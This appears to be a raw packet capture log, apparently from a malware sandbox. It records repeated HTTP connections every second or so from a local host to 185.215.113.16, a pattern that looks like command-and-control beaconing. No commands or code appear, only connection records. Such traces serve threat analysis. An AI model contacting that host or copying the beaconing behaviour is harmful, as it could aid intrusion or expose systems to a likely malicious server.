Jul 27, 2024 09:35:06.294784069 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:06.409843922 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:06.410218000 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:06.415071011 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:06.415117025 CEST	80	49722	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:06.415167093 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:06.415201902 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:06.415327072 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:06.420255899 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:07.175765991 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:07.175863028 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:07.176584959 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:07.181358099 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:07.425575018 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:07.425685883 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:07.534929037 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:07.535424948 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:07.541186094 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:07.541291952 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:07.541480064 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:07.541599035 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:07.541666031 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:07.546322107 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:08.305969000 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:08.306072950 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:08.306699991 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:08.311647892 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:08.554152012 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:08.554234028 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:08.660367966 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:08.660896063 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:08.666225910 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:08.666342974 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:08.666352987 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:08.666412115 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:08.666590929 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:08.671480894 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:09.411015987 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:09.411290884 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:09.411914110 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:09.417224884 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:09.661366940 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:09.661452055 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:09.769181013 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:09.769383907 CEST	49726	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:09.774420023 CEST	80	49726	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:09.774770975 CEST	49726	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:09.774810076 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:09.774835110 CEST	49726	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:09.774868011 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:09.780049086 CEST	80	49726	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:10.546828032 CEST	80	49726	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:10.547024012 CEST	49726	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:10.547522068 CEST	49726	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:10.552553892 CEST	80	49726	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:10.800358057 CEST	80	49726	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:10.800447941 CEST	49726	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:10.910121918 CEST	49726	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:10.910195112 CEST	49728	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:10.915911913 CEST	80	49726	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:10.916110992 CEST	49726	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:10.916271925 CEST	80	49728	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:10.916352034 CEST	49728	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:10.916477919 CEST	49728	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:10.923084974 CEST	80	49728	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:11.670475006 CEST	80	49728	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:11.670558929 CEST	49728	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:11.672993898 CEST	49728	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:11.678400993 CEST	80	49728	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:11.917912960 CEST	80	49728	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:11.917999029 CEST	49728	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:12.019124985 CEST	49728	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:12.019452095 CEST	49729	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:12.025544882 CEST	80	49728	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:12.025590897 CEST	80	49729	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:12.025624037 CEST	49728	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:12.025806904 CEST	49729	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:12.025892973 CEST	49729	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:12.031219959 CEST	80	49729	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:13.738756895 CEST	80	49729	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:13.739087105 CEST	49729	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:13.739223003 CEST	80	49729	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:13.739362001 CEST	80	49729	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:13.739418983 CEST	49729	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:13.739418983 CEST	49729	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:13.739873886 CEST	49729	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:13.740161896 CEST	80	49729	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:13.740225077 CEST	49729	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:13.978324890 CEST	80	49729	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:14.227438927 CEST	80	49729	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:14.227657080 CEST	49729	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:14.331931114 CEST	49729	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:14.332381010 CEST	49730	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:14.340048075 CEST	80	49730	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:14.340089083 CEST	80	49729	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:14.340269089 CEST	49730	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:14.340269089 CEST	49729	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:14.340356112 CEST	49730	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:14.345709085 CEST	80	49730	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:15.177979946 CEST	80	49730	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:15.178284883 CEST	49730	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:15.179322004 CEST	49730	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:15.186068058 CEST	80	49730	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:15.426304102 CEST	80	49730	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:15.426548004 CEST	49730	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:15.535121918 CEST	49730	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:15.535450935 CEST	49731	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:15.540545940 CEST	80	49731	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:15.540673971 CEST	49731	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:15.540766954 CEST	49731	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:15.541040897 CEST	80	49730	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:15.541256905 CEST	49730	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:15.546411991 CEST	80	49731	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:16.278747082 CEST	80	49731	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:16.278994083 CEST	49731	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:16.279750109 CEST	49731	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:16.285676956 CEST	80	49731	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:16.526026011 CEST	80	49731	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:16.526344061 CEST	49731	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:16.628541946 CEST	49731	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:16.628962040 CEST	49732	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:16.634563923 CEST	80	49732	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:16.634820938 CEST	49732	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:16.634820938 CEST	49732	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:16.636991978 CEST	80	49731	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:16.637058020 CEST	49731	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:16.643404961 CEST	80	49732	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:17.435533047 CEST	80	49732	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:17.436069965 CEST	49732	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:17.436959028 CEST	49732	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:17.442595959 CEST	80	49732	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:17.683476925 CEST	80	49732	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:17.683685064 CEST	49732	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:17.784956932 CEST	49732	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:17.785120964 CEST	49733	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:17.790266991 CEST	80	49733	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:17.790360928 CEST	49733	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:17.790524006 CEST	49733	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:17.793190002 CEST	80	49732	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:17.793405056 CEST	49732	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:17.796739101 CEST	80	49733	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:18.540328979 CEST	80	49733	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:18.540543079 CEST	49733	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:18.541156054 CEST	49733	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:18.547075033 CEST	80	49733	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:18.788273096 CEST	80	49733	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:18.788460970 CEST	49733	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:18.894614935 CEST	49733	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:18.894762039 CEST	49734	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:18.908466101 CEST	80	49734	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:18.908586025 CEST	49734	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:18.908792019 CEST	49734	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:18.910249949 CEST	80	49733	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:18.910336018 CEST	49733	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:18.920718908 CEST	80	49734	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:19.694700956 CEST	80	49734	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:19.694828987 CEST	49734	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:19.695584059 CEST	49734	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:19.700917959 CEST	80	49734	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:19.946804047 CEST	80	49734	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:19.946939945 CEST	49734	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:20.050510883 CEST	49734	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:20.050852060 CEST	49735	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:20.057437897 CEST	80	49734	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:20.057483912 CEST	80	49735	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:20.057534933 CEST	49734	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:20.057751894 CEST	49735	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:20.057841063 CEST	49735	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:20.062745094 CEST	80	49735	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:20.808569908 CEST	80	49735	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:20.808676958 CEST	49735	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:20.811388969 CEST	49735	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:20.816725016 CEST	80	49735	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:21.058656931 CEST	80	49735	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:21.058973074 CEST	49735	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:21.175977945 CEST	49735	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:21.176348925 CEST	49737	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:21.181559086 CEST	80	49735	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:21.181643963 CEST	49735	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:21.182286024 CEST	80	49737	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:21.182384968 CEST	49737	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:21.182579994 CEST	49737	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:21.187870979 CEST	80	49737	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:21.943689108 CEST	80	49737	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:21.943799973 CEST	49737	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:21.944624901 CEST	49737	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:21.949970007 CEST	80	49737	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:22.195077896 CEST	80	49737	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:22.195302010 CEST	49737	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:22.300405979 CEST	49737	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:22.300623894 CEST	49738	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:22.508069992 CEST	80	49738	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:22.508321047 CEST	49738	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:22.508475065 CEST	49738	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:22.513941050 CEST	80	49738	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:22.525743008 CEST	80	49737	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:22.525907993 CEST	49737	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:23.267412901 CEST	80	49738	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:23.267496109 CEST	49738	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:23.268232107 CEST	49738	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:23.295969963 CEST	80	49738	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:23.579539061 CEST	80	49738	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:23.579755068 CEST	49738	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:23.691232920 CEST	49738	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:23.691585064 CEST	49739	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:23.697283030 CEST	80	49739	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:23.697371960 CEST	49739	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:23.697460890 CEST	49739	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:23.698332071 CEST	80	49738	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:23.698398113 CEST	49738	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:23.702755928 CEST	80	49739	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:24.446705103 CEST	80	49739	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:24.446971893 CEST	49739	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:24.447643995 CEST	49739	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:24.454125881 CEST	80	49739	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:24.822426081 CEST	80	49739	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:24.822760105 CEST	49739	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:24.925352097 CEST	49739	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:24.925657034 CEST	49740	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:24.935830116 CEST	80	49740	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:24.935904980 CEST	49740	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:24.936054945 CEST	49740	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:24.936470985 CEST	80	49739	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:24.936563969 CEST	49739	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:24.941952944 CEST	80	49740	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:25.850984097 CEST	80	49740	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:25.851284981 CEST	49740	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:25.852160931 CEST	49740	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:25.858725071 CEST	80	49740	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:26.133748055 CEST	80	49740	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:26.133896112 CEST	49740	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:26.237968922 CEST	49740	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:26.238305092 CEST	49741	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:26.243957043 CEST	80	49741	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:26.244216919 CEST	49741	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:26.244283915 CEST	49741	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:26.244400024 CEST	80	49740	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:26.244472980 CEST	49740	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:26.250053883 CEST	80	49741	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:26.995523930 CEST	80	49741	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:26.995804071 CEST	49741	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:26.996520042 CEST	49741	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:27.002341986 CEST	80	49741	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:27.258722067 CEST	80	49741	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:27.259007931 CEST	49741	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:27.363230944 CEST	49741	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:27.363452911 CEST	49742	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:27.369240999 CEST	80	49742	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:27.369515896 CEST	49742	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:27.369517088 CEST	49742	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:27.369844913 CEST	80	49741	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:27.370069981 CEST	49741	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:27.375349045 CEST	80	49742	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:28.113677025 CEST	80	49742	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:28.113907099 CEST	49742	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:28.114548922 CEST	49742	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:28.120266914 CEST	80	49742	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:28.362354040 CEST	80	49742	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:28.362445116 CEST	49742	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:28.472579002 CEST	49742	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:28.472794056 CEST	49743	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:28.477926016 CEST	80	49742	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:28.478045940 CEST	49742	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:28.478157043 CEST	80	49743	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:28.478220940 CEST	49743	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:28.478334904 CEST	49743	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:28.483762026 CEST	80	49743	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:29.219233990 CEST	80	49743	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:29.219592094 CEST	49743	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:29.220431089 CEST	49743	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:29.226181984 CEST	80	49743	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:29.468216896 CEST	80	49743	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:29.468570948 CEST	49743	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:29.583395004 CEST	49743	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:29.583672047 CEST	49744	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:29.588685036 CEST	80	49744	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:29.588769913 CEST	49744	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:29.588962078 CEST	49744	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:29.589473009 CEST	80	49743	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:29.589540958 CEST	49743	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:29.593875885 CEST	80	49744	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:30.354145050 CEST	80	49744	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:30.354635000 CEST	49744	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:30.355257034 CEST	49744	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:30.360788107 CEST	80	49744	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:30.604315042 CEST	80	49744	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:30.604568958 CEST	49744	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:30.707694054 CEST	49744	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:30.711251020 CEST	49745	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:30.713546038 CEST	80	49744	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:30.713613033 CEST	49744	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:30.716552973 CEST	80	49745	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:30.716644049 CEST	49745	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:30.716896057 CEST	49745	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:30.722589016 CEST	80	49745	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:31.473229885 CEST	80	49745	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:31.473535061 CEST	49745	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:31.474073887 CEST	49745	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:31.479526997 CEST	80	49745	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:31.724093914 CEST	80	49745	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:31.724308968 CEST	49745	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:31.831825018 CEST	49745	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:31.832138062 CEST	49746	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:31.838061094 CEST	80	49745	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:31.838243008 CEST	49745	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:31.838630915 CEST	80	49746	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:31.838722944 CEST	49746	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:31.838891983 CEST	49746	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:31.844400883 CEST	80	49746	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:32.624861956 CEST	80	49746	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:32.625050068 CEST	49746	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:32.625649929 CEST	49746	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:32.630506992 CEST	80	49746	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:32.878212929 CEST	80	49746	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:32.878432989 CEST	49746	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:32.988171101 CEST	49746	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:32.988535881 CEST	49747	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:32.993546009 CEST	80	49747	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:32.993628025 CEST	49747	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:32.993767977 CEST	49747	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:32.994155884 CEST	80	49746	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:32.994342089 CEST	49746	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:32.998859882 CEST	80	49747	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:33.735363007 CEST	80	49747	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:33.735815048 CEST	49747	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:33.736378908 CEST	49747	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:33.741950989 CEST	80	49747	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:33.992743015 CEST	80	49747	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:33.992851019 CEST	49747	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:34.097467899 CEST	49747	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:34.097758055 CEST	49748	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:34.102849960 CEST	80	49748	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:34.102932930 CEST	49748	80	192.168.2.6	185.215.113.16
